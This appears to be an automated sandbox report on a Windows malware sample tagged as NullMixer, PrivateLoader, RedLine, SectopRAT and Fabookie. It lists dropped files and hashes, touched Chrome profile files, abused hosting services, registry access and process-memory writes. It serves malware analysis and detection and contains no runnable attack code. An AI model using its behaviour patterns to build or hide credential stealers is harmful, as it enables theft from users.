SHA512 042457ce38a4a3f2378827030a232192cda2e072a1e9761a71d85ad01c030a78f0e3f11f78b118d778a9f49822efd30b1d4cddf124375cd47c9dab0cab9602ff

memory/1836-281-0x0000000000400000-0x00000000016FB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F3U_R.J

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/952-282-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/4308-283-0x0000000003020000-0x00000000030C5000-memory.dmp

memory/4308-296-0x00000000030D0000-0x0000000003162000-memory.dmp

memory/4308-293-0x00000000030D0000-0x0000000003162000-memory.dmp

memory/3980-301-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/644-300-0x0000000000400000-0x0000000000414000-memory.dmp

memory/952-320-0x0000000000400000-0x0000000002F29000-memory.dmp

memory/4308-321-0x0000000000400000-0x00000000005F0000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 c98e123b2d89423d2dbf0aadadcb636e
SHA1 8b26d1af4253630b74c543ad515bf8a13ea7b311
SHA256 e644bcd51a6b92601238a1cf3a1b706d80004c75b5f4d1db3f01ab4b21681cb9
SHA512 1b3a6b58170302b8fbc8ed6caf9f838fd92c7432ac25a5a697433792b83784378aa493d3fdd6ff4357f647abbce922757942550e40378b639e5d2aeadc43cd42

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6b46af62cbbbc3a1b88812e25bcc75a5
SHA1 943dd6449ebb6af8d43bf6ebd78260acc10d3034
SHA256 7b931c291654f62cec8607014ae92dd1d94909c626f6593b6bfcd0593ae0464a
SHA512 ff30d38878879388b82f73fdc506ebf5fed62456081ebe390ef721a87b07a2d5fb97d432eab5cc8bc449e2d4615782ed80745aa24f5571638bc4e8a44f8633c4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4405f9e7-367d-4832-ae8e-13f20d90ae8c.tmp

MD5 dfd3c984f443170de5f707ce0de7d306
SHA1 5171a7873fdfd97fc3fc948ad6f91553bd0a140b
SHA256 6eb7789b17cb87a56e6bdf15aa811c225c7fc687fdeae423867747d368f09ab8
SHA512 9e69e49b25908b5b94cc536dced9c9163f0936b5f0322c5606aa36793b7b69988a415d2ca9d45e564e38d304439263a73a6169c04f3445e9d430103712b88b81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 59b025b2af2b9bcb070de1ac367c8f39
SHA1 7d98ae75c1899e4aec00dc03d4b6dc43eb5d5188
SHA256 9a119c7941fda6b312e1ad4a34e1d873199e17545104d0180cef7a99f558237d
SHA512 b7cc1c49d63cef995a49b6cb5379777aea2f09b134459ed8ec9940079d7ec8bdf5eaca8b9f66e824b26a50e4099dd8e381d458a437cd3081ec57af867e1de378

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 338018fd5d698de91190cc4fcbde4359
SHA1 d4fd3615efa87a949c4c058135bbbb1d20084ddf
SHA256 5b33eac2b4ccf626bb59646ac80c9f85655499439979e6d46dea41f2f452885f
SHA512 2f039a5216d9b566f4feed8ac50789ccfc691ef4775f8005e208ae7f82cfb9f894c01af225e8c03be72317258fef29a424fb95418d6dcff2d3f5bc143e2b5e7e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 6e9bccc4c404c51477a1ca6fd92d8ebe
SHA1 cfc801a34de3899259e6f90dea25e1b62dc2f864
SHA256 33ffa570c6042749fa37fd9512a833af81a8b892a9f6e1f510dd9f7a6ee5da24
SHA512 c23cfcca2e6fcd3ed14e12aef8bd3dc716f241b14617b3714b957e5c3a2b1e4e245ab80699700f6ed02a6bf60e79a57e44d382018e4c04f170710f29201d7132

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4cf6f2dd49824825bb0b21a0e486be44
SHA1 2e4c878492cb96b0e2cedbabaaaddf05399ebb8d
SHA256 14bf48a5c4f85aaade5008aaded3e8d98afa3e98aecca4b623d496d6f636a798
SHA512 35d2b684791c2693dcb4598960270239762f7c927a782980efaa4ffc5806a07c514a112c7ae3a46c1fdb97a6b845f65dc29da606d92e07291354b8325ae08ba5

C:\Users\Admin\AppData\Local\Temp\scoped_dir4384_756635860\ee05ed80-c056-44a0-bcbd-b5f79dec994f.tmp

MD5 da75bb05d10acc967eecaac040d3d733
SHA1 95c08e067df713af8992db113f7e9aec84f17181
SHA256 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2
SHA512 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef

memory/4308-414-0x00000000030D0000-0x0000000003162000-memory.dmp

memory/4308-415-0x0000000003170000-0x0000000003D6B000-memory.dmp

memory/4308-416-0x0000000003D70000-0x0000000003DFB000-memory.dmp

memory/4308-417-0x0000000003E00000-0x0000000003E87000-memory.dmp

memory/4308-420-0x0000000003E00000-0x0000000003E87000-memory.dmp

memory/4308-421-0x00000000032F0000-0x00000000032F1000-memory.dmp

memory/4308-422-0x00000000031F0000-0x00000000031F4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 ab7697fe6ef9b6fad0f58069dde8a52d
SHA1 c25082b8f75f49f4e229cc272a04455bfea6e4cf
SHA256 e109080cf13b6692aa7f2ddc032c6a56020034f314a9cc192dffedbde22247dd
SHA512 b24a53d7f14fcc920128b7d128336a9c4a1d0b3aa980bc06f7d07e059e144c65b5a8bbf275bbd3ef0878733d080975f206568ba5d45dfd37ba5359a95ad381c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 2e1cdb10a291ce503d88dbec9957dece
SHA1 55a80b5e945353a628947fbfeecd17cce8ded83c
SHA256 a2862149ed7ce96d678532d34e962add3a0a4fa17f4bce5923fadfa2350987f7
SHA512 48b854d7defea2c96a38e8e8f2733dad5e6e66245b9df4b56bfdd736cf222ca61c14e0d00358adc563d25b432e2c6d39ab06066d9ad555523f3711d6a2c0fb23

memory/4308-461-0x000000006ED80000-0x000000006F004000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 57e61628672197287a3cf4b80f5f5436
SHA1 f8dae62974be4da2f839bd1df7e3e021b0141685
SHA256 afb8eac981cfc26a0bad639be0aa1fc4e4e48c0866b62a82f37054127ee21c1f
SHA512 ae74830363b4733a542a6a55b0a4ab502b7a7b834cc5b1ff9379fccfba885b3911e9eea343909aae36c02cbd8e41795bec124d4d2e99bb231731826dc758e34a

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2396 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2080 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe C:\Windows\SysWOW64\cmd.exe
